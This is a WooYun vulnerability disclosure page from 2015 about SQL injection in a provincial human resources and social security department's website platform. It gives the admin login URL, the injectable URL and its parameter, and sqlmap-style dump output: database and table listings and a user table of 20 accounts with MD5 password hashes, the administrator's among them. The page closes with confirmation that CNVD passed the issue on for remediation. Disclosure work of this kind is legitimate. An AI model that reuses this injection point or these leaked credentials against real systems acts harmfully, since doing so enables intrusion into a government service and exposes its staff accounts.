乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-16: 细节已通知厂商并且等待厂商处理中 2015-02-28: 厂商已经确认,细节仅向厂商公开 2015-03-10: 细节向核心白帽子及相关领域专家公开 2015-03-20: 细节向普通白帽子公开 2015-03-30: 细节向实习白帽子公开 2015-04-02: 细节向公众公开
某省人力资源和社会保障厅站群沦陷-影响24个站点
后台:http://www.snjrsj.gov.cn/hbwz/sms/login.jsp
厅财务处厅培训处厅工资处厅仲裁处厅人力资源和社会保障监察处厅养老保险处厅失业就业处厅医保处厅农保处厅人事处厅机关党办厅纪检监察室厅老干处厅农工处厅养老保险局厅后勤中心厅就业局厅教研室厅信息中心厅鉴定中心厅医保中心厅结算中心铁路司机学校境外所
注入点:www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03参数:zxlb
current user: 'HBWZ'available databases [21]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HBWZ[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDBDatabase: HBWZ[68 tables]+-----------------------+| ATTACH || BUS_DOC || BUS_DOC_ATTACHMENT || CMS_CHANNEL || CMS_CHANNELPROPERTY || CMS_CHANNELRIGHT || CMS_CLICKCOOKIE || CMS_CLICK_IP || CMS_CLICK_WSBS || CMS_CONFIG || CMS_DOCLOG || CMS_DOCPROPERTY || CMS_DOCSTATUS || CMS_DOCUMENT || CMS_DOCUMENTPROPERTY || CMS_OPER || CMS_PAGE || CMS_SCHEDULE || CMS_SITE || CMS_SITERIGHT || CMS_SITEUSER |`| CMS_SPECIAL || CMS_STATITEM || CMS_TEMP || DIC_AREA || DIC_DICTIONARY || DIC_DOCFROM || DIC_HFFS || DIC_HFKS || DIC_JLHD_BUSINESSTYPE || DIC_STATUS || DIC_TJZX || DIC_USERTYPE || DIC_ZXLB || DIC_ZXZX_SERVICETYPE || JLHD_JZXX || JLHD_TSJB || JLHD_ZXZX || NEWNET_OLDNET || QT_CQZC || SYSTEM_ID || SYS_MENU || SYS_RESOURCE || SYS_RIGHT || SYS_SUBSYSTEM || T_SURVEY || T_SURVEYITEM || UAMS_ORG || UAMS_ROLE || UAMS_ROLEMENU || UAMS_ROLERIGHT || UAMS_ROLESUBSYSTEM || UAMS_ROLEUSER || UAMS_USER |`| WJ_ADMINS |`| WJ_OBJECT || WJ_QUESTION || WJ_REQUEST || WJ_SELECTER || WSZB_FILE || WSZB_SP || WSZB_TOPIC || WSZB_WYPL || WSZB_WZZB || XW_WZHF || ZXZX_QX || ZX_DX || ZX_INFO |+-----------------------+
Database: HBWZTable: CMS_SITEUSER[2 columns]+---------+--------+| Column | Type |+---------+--------+| SITEID | NUMBER || USER_ID | NUMBER |+---------+--------+Database: HBWZTable: UAMS_USER[14 columns]+------------+----------+| Column | Type |+------------+----------+| ADDRESS | VARCHAR2 || CREATETIME | VARCHAR2 || CREATEUSER | VARCHAR2 || DELETETIME | VARCHAR2 || EMAIL | VARCHAR2 || LOGINNAME | VARCHAR2 || MOBILE | VARCHAR2 || ORG_ID | VARCHAR2 || PASSWORD | VARCHAR2 |`| REALNAME | VARCHAR2 |`| STATUS | NUMBER || TEL | VARCHAR2 || USER_ID | NUMBER |`| USERTYPE | VARCHAR2 |+------------+----------+Database: HBWZTable: UAMS_USER[20 entries]+------------------+---------+------+-------+--------+--------+---------+-----------+----------+----------------------------------+-----------+------------+---------------------+---------------------+| ORG_ID | USER_ID | TEL | EMAIL | STATUS | MOBILE | ADDRESS | REALNAME | USERTYPE | PASSWORD | LOGINNAME | CREATEUSER | DELETETIME | CREATETIME |+------------------+---------+------+-------+--------+--------+---------+-----------+----------+----------------------------------+-----------+------------+---------------------+---------------------+| 2010082600000143 | 163 | NULL | NULL | 1 | NULL | NULL | snjgsbx | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjgsbx | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:52:10 || 2010082600000143 | 164 | NULL | NULL | 1 | NULL | NULL | snjsybx | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjsybx | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:53:45 || 2010082600000143 | 167 | NULL | NULL | 1 | NULL | NULL | snjcxyl | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjcxyl | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:59:08 || 2010082600000143 | 169 | NULL | NULL | 1 | NULL | NULL | snjgzfl | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjgzfl | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:03:26 || 2010082600000143 | 174 | NULL | NULL | 1 | NULL | NULL | snjgwygl | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjgwygl | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:10:42 || 2010082600000143 | 175 | NULL | NULL | 1 | NULL | NULL | snjsydwgl | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjsydwgl | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:12:43 || 2010082600000143 | 176 | NULL | NULL | 1 | NULL | NULL | snjzynl | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjzynl | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:14:00 || 2010082600000143 | 180 | NULL | NULL | 1 | NULL | NULL | snjzjzc | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjzjzc | NULL | 3001-01-01 00:00:00 | 2013-04-02 10:18:22 || 2010082600000143 | 141 | NULL | NULL | 1 | NULL | NULL | snjzm | 01 | ef7d8ea3aeba02c75ba27233ff59fe75 | snjzm | NULL | 3001-01-01 00:00:00 | 2012-05-30 09:38:24 || 2010082600000123 | 1 | NULL | NULL | 1 | NULL | NULL | admin | 99 | 30983366f8039e3078918474e4a403a3 | admin | 1 | 3000-01-01 00:00:00 | 2007-10-17 20:32:11 || 2010082600000143 | 140 | NULL | NULL | 1 | NULL | 信息中心 | snjfjj | 01 | 96e79218965eb72c92a549dd5a330112 | snjfjj | NULL | 3001-01-01 00:00:00 | 2012-05-29 08:13:06 || 2010082600000143 | 160 | NULL | NULL | 1 | NULL | NULL | snjghcw | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjghcw | NULL | 3001-01-01 00:00:00 | 2012-10-15 10:21:02 || 2010082600000143 | 161 | NULL | NULL | 1 | NULL | NULL | snjylbx | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjylbx | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:46:55 || 2010082600000143 | 162 | NULL | NULL | 1 | NULL | NULL | snjylbx1 | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjylbx1 | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:50:50 || 2010082600000143 | 165 | NULL | NULL | 1 | NULL | NULL | snjsybx1 | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjsybx1 | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:55:14 || 2010082600000143 | 166 | NULL | NULL | 1 | NULL | NULL | snjcxyb | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjcxyb | NULL | 3001-01-01 00:00:00 | 2012-10-15 04:56:44 || 2010082600000143 | 170 | NULL | NULL | 1 | NULL | NULL | snjtjzc | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjtjzc | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:04:41 || 2010082600000143 | 171 | NULL | NULL | 1 | NULL | NULL | snjldjc | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjldjc | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:06:29 || 2010082600000143 | 172 | NULL | NULL | 1 | NULL | NULL | snjrsks | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjrsks | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:07:40 || 2010082600000143 | 173 | NULL | NULL | 1 | NULL | NULL | snjjysy | 01 | 670b14728ad9902aecba32e22fa4f6bd | snjjysy | NULL | 3001-01-01 00:00:00 | 2012-10-15 05:08:40 |+------------------+---------+------+-------+--------+--------+---------+-----------+----------+----------------------------------+-----------+------------+---------------------+---------------------+
Database: SYSTEM[141 tables]+-------------------------------+| AQ$_INTERNET_AGENTS || AQ$_INTERNET_AGENT_PRIVS || AQ$_QUEUES || AQ$_QUEUE_TABLES || AQ$_SCHEDULES || DEF$_AQCALL || DEF$_AQERROR || DEF$_CALLDEST || DEF$_DEFAULTDEST || DEF$_DESTINATION || DEF$_ERROR || DEF$_LOB || DEF$_ORIGIN || DEF$_PROPAGATOR || DEF$_PUSHED_TRANSACTIONS || DEF$_TEMP$LOB || HELP || LOGMNRC_DBNAME_UID_MAP || LOGMNRC_GSII || LOGMNRC_GTCS || LOGMNRC_GTLO || LOGMNRP_CTAS_PART_MAP || LOGMNRT_MDDL$ || LOGMNR_AGE_SPILL$ || LOGMNR_ATTRCOL$ || LOGMNR_ATTRIBUTE$ || LOGMNR_CCOL$ || LOGMNR_CDEF$ || LOGMNR_COL$ || LOGMNR_COLTYPE$ || LOGMNR_DICTIONARY$ || LOGMNR_DICTSTATE$ || LOGMNR_ERROR$ || LOGMNR_FILTER$ || LOGMNR_HEADER1$ || LOGMNR_HEADER2$ || LOGMNR_ICOL$ || LOGMNR_IND$ || LOGMNR_INDCOMPART$ || LOGMNR_INDPART$ || LOGMNR_INDSUBPART$ || LOGMNR_LOB$ || LOGMNR_LOBFRAG$ || LOGMNR_LOG$ || LOGMNR_OBJ$ || LOGMNR_PARAMETER$ || LOGMNR_PROCESSED_LOG$ || LOGMNR_RESTART_CKPT$ || LOGMNR_RESTART_CKPT_TXINFO$ || LOGMNR_SESSION$ || LOGMNR_SESSION_EVOLVE$ || LOGMNR_SPILL$ || LOGMNR_TAB$ || LOGMNR_TABCOMPART$ || LOGMNR_TABPART$ || LOGMNR_TABSUBPART$ || LOGMNR_TS$ || LOGMNR_TYPE$ || LOGMNR_UID$ || LOGMNR_USER$ || LOGSTDBY$APPLY_MILESTONE || LOGSTDBY$APPLY_PROGRESS || LOGSTDBY$EVENTS || LOGSTDBY$HISTORY || LOGSTDBY$PARAMETERS || LOGSTDBY$PLSQL || LOGSTDBY$SCN || LOGSTDBY$SKIP || LOGSTDBY$SKIP_SUPPORT || LOGSTDBY$SKIP_TRANSACTION || MVIEW$_ADV_AJG || MVIEW$_ADV_BASETABLE || MVIEW$_ADV_CLIQUE || MVIEW$_ADV_ELIGIBLE || MVIEW$_ADV_EXCEPTIONS || MVIEW$_ADV_FILTER || MVIEW$_ADV_FILTERINSTANCE || MVIEW$_ADV_FJG || MVIEW$_ADV_GC || MVIEW$_ADV_INDEX || MVIEW$_ADV_INFO || MVIEW$_ADV_JOURNAL || MVIEW$_ADV_LEVEL || MVIEW$_ADV_LOG || MVIEW$_ADV_OUTPUT || MVIEW$_ADV_OWB || MVIEW$_ADV_PARAMETERS || MVIEW$_ADV_PARTITION || MVIEW$_ADV_PLAN || MVIEW$_ADV_PRETTY || MVIEW$_ADV_ROLLUP || MVIEW$_ADV_SQLDEPEND || MVIEW$_ADV_TEMP || MVIEW$_ADV_WORKLOAD || OL$ || OL$HINTS || OL$NODES || REPCAT$_AUDIT_ATTRIBUTE || REPCAT$_AUDIT_COLUMN || REPCAT$_COLUMN_GROUP || REPCAT$_CONFLICT || REPCAT$_DDL || REPCAT$_EXCEPTIONS || REPCAT$_EXTENSION || REPCAT$_FLAVORS || REPCAT$_FLAVOR_OBJECTS || REPCAT$_GENERATED || REPCAT$_GROUPED_COLUMN || REPCAT$_INSTANTIATION_DDL || REPCAT$_KEY_COLUMNS || REPCAT$_OBJECT_PARMS || REPCAT$_OBJECT_TYPES || REPCAT$_PARAMETER_COLUMN || REPCAT$_PRIORITY || REPCAT$_PRIORITY_GROUP || REPCAT$_REFRESH_TEMPLATES || REPCAT$_REPCAT || REPCAT$_REPCATLOG || REPCAT$_REPCOLUMN || REPCAT$_REPGROUP_PRIVS || REPCAT$_REPOBJECT || REPCAT$_REPPROP || REPCAT$_REPSCHEMA || REPCAT$_RESOLUTION || REPCAT$_RESOLUTION_METHOD || REPCAT$_RESOLUTION_STATISTICS || REPCAT$_RESOL_STATS_CONTROL || REPCAT$_RUNTIME_PARMS || REPCAT$_SITES_NEW || REPCAT$_SITE_OBJECTS || REPCAT$_SNAPGROUP || REPCAT$_TEMPLATE_OBJECTS || REPCAT$_TEMPLATE_PARMS || REPCAT$_TEMPLATE_REFGROUPS || REPCAT$_TEMPLATE_SITES || REPCAT$_TEMPLATE_STATUS || REPCAT$_TEMPLATE_TARGETS || REPCAT$_TEMPLATE_TYPES || REPCAT$_USER_AUTHORIZATIONS || REPCAT$_USER_PARM_VALUES || SQLPLUS_PRODUCT_PROFILE |+-------------------------------+
管理员admin登录:
普通用户登录:1、
2、
危害等级:高
漏洞Rank:13
确认时间:2015-02-28 16:44
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给湖北分中心,由湖北分中心后续协调网站管理单位处置。
暂无